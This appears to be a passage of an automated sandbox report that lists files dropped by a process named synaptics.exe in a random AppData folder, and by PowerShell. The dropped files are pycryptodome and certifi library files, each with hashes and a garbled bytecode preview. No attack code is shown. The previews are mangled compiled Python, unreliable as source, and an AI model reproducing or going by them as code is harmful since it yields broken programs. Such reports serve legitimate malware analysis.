                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.Z.g.d...Z.d.S.).a[...Miscellaneous modules..Contains useful modules that don't belong into any of the.other Crypto.* subpackages...======================== =============================================.Module Description.======================== =============================================.`Crypto.Util.number` Number-theoretic functions (primality testing, etc.).`Crypto.Util.Counter` Fast counter functions for CTR cipher modes..`Crypto.Util.RFC1751` Converts between 128-bit keys and human-readable. strings of words..`Crypto.Util.asn1` Minimal support for ASN.1 DER encoding.`Crypto.Util.Padding` Set of functions for adding and removing padding..======================== =============================================..:undocumented: _galois, _number_new, cpuid, py3compat, _raw_api.).Z.RFC1751..numberZ.strxorZ.asn1..CounterZ.PaddingN)...__doc__..__all__
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):705
                                                                                                                                                                                                            Entropy (8bit):4.629902932138858
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:CHcVQ4UlabXgAin19S07ovfsn2mv99J+di+ymIm+l:a+UliQAin19SkyfK2+J+dBIL
                                                                                                                                                                                                            MD5:222618931B6CD331CAA4803871238AD0
                                                                                                                                                                                                            SHA1:501BF26FF05488C03727384C862406C0E9F5875C
                                                                                                                                                                                                            SHA-256:1DF0F62B9E6D3599CDFF953A4C505EAFED3D8B6E3622551C22BF1F14C39ADAFE
                                                                                                                                                                                                            SHA-512:8B2BE112D67CF033AABF03AB55C601CFC82A70CB0E02AE73276ED9F1C3A1F4D7A0FBE537BF8E3CC6AAFDCA3AA1A7EDFCBAB59CE8B37884D1291E9F89A697C93F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s*...d.d.l.m.Z...e.d.d...Z.d.d...Z.d.d...Z.d.S.)......)...load_pycryptodome_raw_libz.Crypto.Util._cpuid_cz.. int have_aes_ni(void);. int have_clmul(void);. c....................C........t.....S...N)..._raw_cpuid_lib..have_aes_ni..r....r.....VC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\Util\_cpu_features.pyr....)..........r....c....................C...r....r....).r......have_clmulr....r....r....r....r....-...r....r....N)...Crypto.Util._raw_apir....r....r....r....r....r....r....r......<module>....s................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):864
                                                                                                                                                                                                            Entropy (8bit):5.3394196582324405
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:fLuapeA2HBZ8SlwC8ES3OyHzwZsfK28M/3k:fLu4YZkCkeyHzwiK8/0
                                                                                                                                                                                                            MD5:08088EFB5BAE1C523B42D44DAA18CC20
                                                                                                                                                                                                            SHA1:3BAF27F20DD8BC423364A969D03CF841FF69CFA6
                                                                                                                                                                                                            SHA-256:BDCCA456046FED0C98C7FA3B48DE05769EC6623D7C18451B8DE54FE70AB9E2F3
                                                                                                                                                                                                            SHA-512:2AFFC0E04C45C7EEB4F5134415B8B910BF0F30520EDF38F2B4367F55CEDF1EC75A9C0FE1824607B5EBAAC11D952D68A7957B020176D5DFC3F627131AAB3C48BF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.Z.d.d...Z.d.S.)......Nc....................C...sd...|.d...d.k.r.t.d.....t.|.d.d.......|.g...}.t.j...t.j...t.....\.}.}.t.j...|.d...}.t.j.j.|.g.|...R...S.).a....Return the complete file name for the module.. dir_comps : list of string. The list of directory names in the PyCryptodome package.. The first element must be "Crypto"... filename : string. The filename (inclusing extension) in the target directory.. r....Z.Cryptoz)Only available for modules under 'Crypto'.....Nz...)...ValueError..list..os..path..split..abspath..__file__..join)...dir_comps..filenameZ.util_lib.._Z.root_lib..r.....UC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\Util\_file_system.py..pycryptodome_filename"...s................r....).r....r....r....r....r....r......<module>....s........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8741
                                                                                                                                                                                                            Entropy (8bit):5.206987069752403
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:mhLyEONC31/QtcU4/GPCenzp7Qb+RQrBIQIu7XNNHD0yXNvjB2IatSxB/dbJg1uw:mhuEONC31ItcUGGPCenzp7Qb+RQrBIQO
                                                                                                                                                                                                            MD5:D6922003DF349A00D747769A1F9CD1B7
                                                                                                                                                                                                            SHA1:13CAFDDD97F88E833D0C7050DBE633C1B3BB7F1E
                                                                                                                                                                                                            SHA-256:E3C27B3A0980A82A133BEF2BFC4E9AED02DC2B315ACBB3D8116AFEEFD2E570B4
                                                                                                                                                                                                            SHA-512:5C04A9C8236336693EB53CF6E8D2CAB1C9626C70E22AAD6A29FBE3B8D097D8C7AAE94F4A614EFE0E8872A7368C7508FA305CE68C4352E32A9C5D94C25ACB88C6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g}*.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.j.d...d.k.r:d.d.l.Z.g.Z.e.....D.].\.Z.Z.Z.e.e.j.k.r8e...e.....q)n.d.d.l.m.Z...e.j.Z.e.e.f.Z.G.d.d...d.e...Z.zkd.e.j.v.r_e.j.j.d.k.r_e.d.....e.j.d.k.rme.j.d.k.rme.d.....d.d.l.m.Z...e...Z.e.j Z!e.."e..#d.....Z$e..#d...j%j&Z'd.d...Z(d.d...Z)e)Z*e)Z+e)Z,d.d...Z-d;d.d...Z.d.d...Z/d.d...Z0d.d...Z1G.d.d ..d e...Z2d!d"..Z3d#Z4W.nt..e...y.......d.d.l5Z5d.d$l5m6Z6m7Z7m8Z8m)Z)m*Z*m-Z-m.Z.m,Z,m+Z+..d.d%l9m:Z:..d.d&l5m;Z'..d.Z!g.Z<d'd(..Z,d)d...Z(d*d...Z/d+d...Z0e5j=Z>d.Z?e5j@jAZBe5j@jCZDe5jEZFe5.Ge>..ZHG.d,d-..d-e5jI..ZJd.d...Z1G.d/d0..d0e...ZKd1d"..Z3d2Z4Y.n.w.G.d3d4..d4e...ZLd5d6..ZMd7d8..ZNd9d:..ZOd.S.)<.....N)...byte_string)...pycryptodome_filename.....)...machineryc....................@...s(...e.Z.d.Z.e.j.d.d.....Z.e.j.d.d.....Z.d.S.)..._VoidPointerc....................C........d.S.).z&Return the memory location we point toN......selfr....r.....QC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-pack
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):30886
                                                                                                                                                                                                            Entropy (8bit):5.223442247500147
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:lz1Enqf1DECvkHf9R3OPtm6q3YZHjSgfShUUEV6:lziCIRePYN3YZHeDzEV6
                                                                                                                                                                                                            MD5:54E947C5178759CFC688EADB9B20859E
                                                                                                                                                                                                            SHA1:51BE27D450C57CC66519C7DE29D322028CF5392B
                                                                                                                                                                                                            SHA-256:8B63B85780D78F65D61C043B1F3F7720538DF2402E8B15FA106F437719FC3E2B
                                                                                                                                                                                                            SHA-512:E1A6C3F232225763711A64CFD1E0B3C7483AB8685DAE599EC321687E18B20787960F02E80D904C816F74C60007E76721309F5884E3A4A9856F80D8BE923012E5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gq........................@...s....d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...g.d...Z.d.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.)......N)...byte_string..bchr..bord)...long_to_bytes..bytes_to_long)...DerObject..DerInteger..DerBoolean..DerOctetString..DerNull..DerSequence..DerObjectId..DerBitString..DerSetOfFc....................C...s4...d.}.z.|.|...}.W.n...t.y.......Y.d.S.w.|...p.|.d.k.S.).Nr....F)...TypeError)...x..only_non_negative..test..r.....MC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\Util\asn1.py.._is_number(...s..................r....c....................@...s@...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...BytesIO_EOFzeThis class differs from BytesIO in that a ValueError exception is. raised whenever EOF is reached.c....................C...s....|.|._.d.|._.d.|._.d.S...Nr....)..._buffer.._in
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):61139
                                                                                                                                                                                                            Entropy (8bit):5.247357868444139
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:sNhCN5FZjyUy0lwXEgNjOtg78YrIn6VhjlLQ5DR4wLDzwK2csHXV:sNQFpyUy0lsEgZOtg78sI6VTLQ5DRvv6
                                                                                                                                                                                                            MD5:CD1ABF54C5D049FBE6D3FA3CE2195A94
                                                                                                                                                                                                            SHA1:7689C1AE5AE8D69E13AD5FC4E5A76374C3721B60
                                                                                                                                                                                                            SHA-256:1B2B7397BDB6A05C8A57F082E85D52886A07BD1955F6648B81845A411EBAE8C6
                                                                                                                                                                                                            SHA-512:8AE7CF798B2451CF233DC8DB0110C583C4C2F50E4428F223A3746A97CA86D71A49CA0EF9EA3A789FC2A18EB9140C427ABE092316CD36D9ABEDEC18968650473D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gh~.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.d.d...Z.d.d...Z.d(d.d...Z.d(d.d...Z.d(d.d...Z.e.j.d.d.....d.k.r>e.j.Z.n.d.d...Z.e.j.d.d.....d.k.rPd.d...Z.n.d.d...Z.d(d.d...Z.d(d.d...Z.d)d.d...Z.d*d.d...Z.d.d.l.Z.d+d.d ..Z.d!d"..Z.d.d.l.Z.d+d#d$..Z.d%d&..Z.d'Z.d.S.),.....N)...Random)...iter_rangec....................C...sP...|.d.k.r.t.....|.d.k.s.|.d.k.r.t.d.....t.|.|...\.}.}.|.d.k.r&|.d.k.r&|.d.7.}.|.S.).zDReturn ceil(n/d), that is, the smallest integer r such that r*d >= nr....z.Non positive values.....)...ZeroDivisionError..ValueError..divmod)...n..d..r..q..r.....OC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\Util\number.py..ceil_div%...s....................r....c....................C...s....|.d.k.r.t.d.....|.....S.).z)Returns the size of the number N in bits.r....z4Size in bits only available for non-negative numbers).r......bit_length)...Nr....r....r......size2...s..........r....c....................C...sZ...|.d.u
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):61139
                                                                                                                                                                                                            Entropy (8bit):5.247357868444139
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:sNhCN5FZjyUy0lwXEgNjOtg78YrIn6VhjlLQ5DR4wLDzwK2csHXV:sNQFpyUy0lsEgZOtg78sI6VTLQ5DRvv6
                                                                                                                                                                                                            MD5:CD1ABF54C5D049FBE6D3FA3CE2195A94
                                                                                                                                                                                                            SHA1:7689C1AE5AE8D69E13AD5FC4E5A76374C3721B60
                                                                                                                                                                                                            SHA-256:1B2B7397BDB6A05C8A57F082E85D52886A07BD1955F6648B81845A411EBAE8C6
                                                                                                                                                                                                            SHA-512:8AE7CF798B2451CF233DC8DB0110C583C4C2F50E4428F223A3746A97CA86D71A49CA0EF9EA3A789FC2A18EB9140C427ABE092316CD36D9ABEDEC18968650473D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gh~.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.d.d...Z.d.d...Z.d(d.d...Z.d(d.d...Z.d(d.d...Z.e.j.d.d.....d.k.r>e.j.Z.n.d.d...Z.e.j.d.d.....d.k.rPd.d...Z.n.d.d...Z.d(d.d...Z.d(d.d...Z.d)d.d...Z.d*d.d...Z.d.d.l.Z.d+d.d ..Z.d!d"..Z.d.d.l.Z.d+d#d$..Z.d%d&..Z.d'Z.d.S.),.....N)...Random)...iter_rangec....................C...sP...|.d.k.r.t.....|.d.k.s.|.d.k.r.t.d.....t.|.|...\.}.}.|.d.k.r&|.d.k.r&|.d.7.}.|.S.).zDReturn ceil(n/d), that is, the smallest integer r such that r*d >= nr....z.Non positive values.....)...ZeroDivisionError..ValueError..divmod)...n..d..r..q..r.....OC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\Util\number.py..ceil_div%...s....................r....c....................C...s....|.d.k.r.t.d.....|.....S.).z)Returns the size of the number N in bits.r....z4Size in bits only available for non-negative numbers).r......bit_length)...Nr....r....r......size2...s..........r....c....................C...sZ...|.d.u
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5258
                                                                                                                                                                                                            Entropy (8bit):4.925897418511187
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:XcF/EpktYDLOjIWTmpSaRBF7mgcwi/e/7/9whOJZg+6B6cGZ2B+uWc7xUK6It:XW/EpkGUIW82HWzL0zJU+
                                                                                                                                                                                                            MD5:652EF0685C8364BDE2D69EE8DC213F2E
                                                                                                                                                                                                            SHA1:C4DA8BD0485B0E089B2502676E43543C99FEF60A
                                                                                                                                                                                                            SHA-256:0D20CAE049FEEC6E0D533DDF43DDCB8932DA135103A55BCB2C91232FC1AD0102
                                                                                                                                                                                                            SHA-512:7A07E90DD5AC299D5A1C037FA398B1C8E30C414F24AB94F4FA891438B2C7D25DB570110F1A0FC2B91094B5BA43C2FC6A8F8C10D38B7839BFDEAC21D0BFD02838
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gz........................@...sX...d.Z.d.d.l.Z.d.d.l.Z.e.j.d...d.k.r[d.d...Z.d.d...Z.d.d...Z.d.d...Z.d0d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.l.m.Z...e.Z.d.d.l.m.Z...e.Z.d.d...Z.d.d...Z.d.d...Z.e...d.e.f.d.d.i...Z.e.Z.nId d...Z.d!d...Z.d"d...Z.d#d...Z.d0d$d...Z.d%d...Z.d&d...Z.d'd...Z.d.d(l.m.Z...d.d.l.m.Z...d.d)l.m.Z...e.Z.d*d...Z.d+d...Z.d,d...Z.d.d-l.m.Z...e.Z.d.d/..Z.[.[.d.S.)1a....Compatibility code for handling string/bytes changes from Python 2.x to Py3k..In Python 2.x, strings (of type ''str'') contain binary data, including encoded.Unicode text (e.g. UTF-8). The separate type ''unicode'' holds Unicode text..Unicode literals are specified via the u'...' prefix. Indexing or slicing.either type always produces a string of the same type as the original..Data read from a file is always of '''str'' type...In Python 3.x, strings (type ''str'') may only contain Unicode text. The u'...'.prefix and the ''unicode'' type are now redundant. A new type (called.''bytes'') has to b
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3269
                                                                                                                                                                                                            Entropy (8bit):5.113077827176243
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:j4jdkxR/B0sI/LU/kwf+RDQ+XfxGsKrccFVQuWP/Z6mQaG8PR02B4Ho4Uw7sR:j4xkv/3WLJwyJfmrccFuz/Z6CG8G1hW
                                                                                                                                                                                                            MD5:B45420E06F0C50D587719709518F1B8A
                                                                                                                                                                                                            SHA1:E74A51CAB6235DF21EE4EFCC27EF09B42614C2A4
                                                                                                                                                                                                            SHA-256:8F3BA13797E043591E31F3CB2000225E90DF53C763CFF6BD7D944EA8E0C03150
                                                                                                                                                                                                            SHA-512:33D29AE1E9F35D131BC0C97EFB7790F63622F93442600AFF1AB0FAD3C151193910C03EE8763DFE341CE23C5E6387344D58A03D1FFB9EBAC3170C8A4EC8FC48CA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sJ...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.S.)......)...load_pycryptodome_raw_lib..c_size_t..create_string_buffer..get_raw_buffer..c_uint8_ptr..is_writeable_bufferz.Crypto.Util._strxoray.... void strxor(const uint8_t *in1,. const uint8_t *in2,. uint8_t *out, size_t len);. void strxor_c(const uint8_t *in,. uint8_t c,. uint8_t *out,. size_t len);. Nc....................C...s....t.|...t.|...k.r.t.d.....|.d.u.r.t.t.|.....}.n.|.}.t.|...s!t.d.....t.|...t.|...k.r1t.d.t.|.........t...t.|...t.|...t.|...t.t.|.........|.d.u.rKt.|...S.d.S.).a....From two byte strings of equal length,. create a third one which is the byte-by-byte XOR of the two... Args:. term1 (bytes/bytearray/memoryview):. Th
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):440
                                                                                                                                                                                                            Entropy (8bit):5.181092891619677
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:y/GCYB21NXYvAL/tdxmAfTwAvrPllqGl/llYlekkvuPllfM+uwkn23h/a/ArMDPF:CGCY6ovkxNPll8kkU4Xfsnf9oyF
                                                                                                                                                                                                            MD5:D9CADB5C5D0A4B7B477125729E83E3AB
                                                                                                                                                                                                            SHA1:44F5EDCACC15087F49310D8890B6698326C176CA
                                                                                                                                                                                                            SHA-256:D2831091D3866274B10912835A654CDD9D5C88760A76DF4EB9F971F46DCAB924
                                                                                                                                                                                                            SHA-512:7422743FCCFEE2979BFF0331A48C153AF9BB7CD2FDC02A9CC96ABF4B52F5A5A649063B4125E81CBB5086A85232242E366E55B0504DD0C435150409A5BBB40EA5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s$...g.d...Z.d.Z.d...d.d...e.D.....Z.d.S.).).Z.CipherZ.Hash..ProtocolZ.PublicKeyZ.Util..Signature..IOZ.Math).............0...c....................C...s....g.|.].}.t.|.....q.S...)...str)....0..xr....r.....LC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\__init__.py..<listcomp>....s......r....N)...__all__..version_info..join..__version__r....r....r....r......<module>....s..........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7576
                                                                                                                                                                                                            Entropy (8bit):5.079466903901472
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:OcgPE5vNnnqs8NYd7pqqx0H/8qq/xqqqRuLMJXHge3YbkqZPqqq3KqUCwqEMlkgM:GyvNnnqs+67pqqx0H/8qq/xqqqRuLMXC
                                                                                                                                                                                                            MD5:57DFBF68EF4EDD8334EB3EF0095D00DC
                                                                                                                                                                                                            SHA1:5FECAF0CA1EFFA3E84681D6CA2FD5B5AC00A1032
                                                                                                                                                                                                            SHA-256:FCCCFF09D2A989A5E1C5B2CBFB10E75C6D347DAF24F110E85D8F614F25229519
                                                                                                                                                                                                            SHA-512:070CA97243CC2B5ED120E9100282C2B4A53FD24E44C36D7B7A840962C2B77C59B843A06C65D810E5C72CBC7B25D0C9D62D92A4E0263CE6B09386CC953C1E2609
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......^..g.........................@...s....d.d.l.Z.d.d.l.Z.d.e.j.v.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.G.d.d...d...Z.G.d.d...d...Z.e.j.D.].Z.e.e.d.e.....e.j.....q2e...Z.d.d...Z.G.d.d...d...Z.d.d...Z.d.d...Z.d.S.)......NZ.__pypy__c....................C...s6...d.t.j.v.r.d.S.t.r.t.j.d.k.r.d.S.d.d.l.}.|...d.....d.S.).N..distutils)...........r....a....Distutils was imported before Setuptools, but importing Setuptools also replaces the `distutils` module in `sys.modules`. This may lead to undesirable behaviors or errors. To avoid these issues, avoid using distutils directly, ensure that setuptools is installed in the traditional way (e.g. not an editable install), and/or make sure that setuptools is always imported before distutils.)...sys..modules..is_pypy..version_info..warnings..warn).r......r.....UC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\_distutils_hack\__init__.py..warn_distutils_present....s....................r....c....................C...sF...d.t.j.v.r.d.S.d
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):989
                                                                                                                                                                                                            Entropy (8bit):5.027120368969846
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:gWAJJ4J70RRrZNCeZi3vN8kg4ahrmZBzCP07U5:BAn4JQrru9fctOBmP0W
                                                                                                                                                                                                            MD5:11618CB6A975948679286B1211BD573C
                                                                                                                                                                                                            SHA1:3B4D48F29780C79B4484B1B3979544766B626FDB
                                                                                                                                                                                                            SHA-256:E93716DA6B9C0D5A4A1DF60FE695B370F0695603D21F6F83F053E42CFC10CAF7
                                                                                                                                                                                                            SHA-512:B947088E27B8420A4F69088D3FA9CE0B9BD0AC142783D01A3E8A762382F8A9EDEF68C9E34E54230EB9F86C53C8F2F44C9FE327257B5631021B23FE9D21E08E4C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:This package contains a modified version of ca-bundle.crt:..ca-bundle.crt -- Bundle of CA Root Certificates..This is a bundle of X.509 certificates of public Certificate Authorities.(CA). These were automatically extracted from Mozilla's root certificates.file (certdata.txt). This file can be found in the mozilla source tree:.https://hg.mozilla.org/mozilla-central/file/tip/security/nss/lib/ckfw/builtins/certdata.txt.It contains the certificates in PEM format and therefore.can be directly used with curl / libcurl / php_curl, or with.an Apache+mod_ssl webserver for SSL client authentication..Just configure this file as the SSLCACertificateFile.#..***** BEGIN LICENSE BLOCK *****.This Source Code Form is subject to the terms of the Mozilla Public License,.v. 2.0. If a copy of the MPL was not distributed with this file, You can obtain.one at http://mozilla.org/MPL/2.0/...***** END LICENSE BLOCK *****.@(#) $RCSfile: certdata.txt,v $ $Revision: 1.80 $ $Date: 2011/11/03 15:11:58 $.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2222
                                                                                                                                                                                                            Entropy (8bit):4.979804731554947
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:Df/cqC4FaMLiPktjazXHzAaBZhYRG+qLcUydytw:DfUqnFaMmPktjazXTQTq3Aytw
                                                                                                                                                                                                            MD5:DE61603A4108A779F898BD61F96A9ED8
                                                                                                                                                                                                            SHA1:9327AD0BDA86C1BE61644ACF536B271FD19B0929
                                                                                                                                                                                                            SHA-256:1A104745550DE9AE19754804FCDE709AE9097F2BA813E432225F18DE27CD4013
                                                                                                                                                                                                            SHA-512:AF8EA145DAB9A9AB7D1B9B49B9E05FA8E41E8BF5A421AE75118C9B7E906BA63AA7C495D35B672AE5CC63528C57D8C11E5BA07C6E38BDBE4F2423755FD7B03AB3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: certifi.Version: 2024.8.30.Summary: Python package for providing Mozilla's CA Bundle..Home-page: https://github.com/certifi/python-certifi.Author: Kenneth Reitz.Author-email: me@kennethreitz.com.License: MPL-2.0.Project-URL: Source, https://github.com/certifi/python-certifi.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Mozilla Public License 2.0 (MPL 2.0).Classifier: Natural Language :: English.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.6.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1014
                                                                                                                                                                                                            Entropy (8bit):5.864128954282519
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:HqKn/2zDlKvxQKDbdWaKKKK7Kl29yq4Q7p7nWRkGKycDJqUndwYWJV:lnuXw1DpClK+l2UQVL7DRKYWJV
                                                                                                                                                                                                            MD5:1F56F158EE94979BEE16D159D2815942
                                                                                                                                                                                                            SHA1:F27EE7A5EC732F942166EC4EB2E3D9A01AE9C97E
                                                                                                                                                                                                            SHA-256:B9AC4776E707F29577B369769D4F263B07BFE7E45F96E40EF562C7989A9D67BC
                                                                                                                                                                                                            SHA-512:E619B6C69FA736C2695BDDAE7FB73E6E4FD57372B4DB7AB1FEE0BA623E83D6737FBA3FD33BBBF390A346A8FB3B35CFE6871F881C8B4617A0F9E6115942E73217
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:certifi-2024.8.30.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..certifi-2024.8.30.dist-info/LICENSE,sha256=6TcW2mucDVpKHfYP5pWzcPBpVgPSH2-D8FPkLPwQyvc,989..certifi-2024.8.30.dist-info/METADATA,sha256=GhBHRVUN6a4ZdUgE_N5wmukJfyuoE-QyIl8Y3ifNQBM,2222..certifi-2024.8.30.dist-info/RECORD,,..certifi-2024.8.30.dist-info/WHEEL,sha256=UvcQYKBHoFqaQd6LKyqHw9fxEolWLQnlzP0h_LgJAfI,91..certifi-2024.8.30.dist-info/top_level.txt,sha256=KMu4vUCfsjLrkPbSNdgdekS-pVJzBAJFO__nI8NF6-U,8..certifi/__init__.py,sha256=p_GYZrjUwPBUhpLlCZoGb0miKBKSqDAyZC5DvIuqbHQ,94..certifi/__main__.py,sha256=xBBoj905TUWBLRGANOcf7oi6e-3dMP4cEoG9OyMs11g,243..certifi/__pycache__/__init__.cpython-310.pyc,,..certifi/__pycache__/__main__.cpython-310.pyc,,..certifi/__pycache__/core.cpython-310.pyc,,..certifi/cacert.pem,sha256=lO3rZukXdPyuk6BWUJFOKQliWaXH6HGh9l1GGrUgG0c,299427..certifi/core.py,sha256=qRDDFyXVJwTB_EmoGppaXU_R9qCZvhl-EzxPMuV3nTA,4426..certifi/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMp
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text
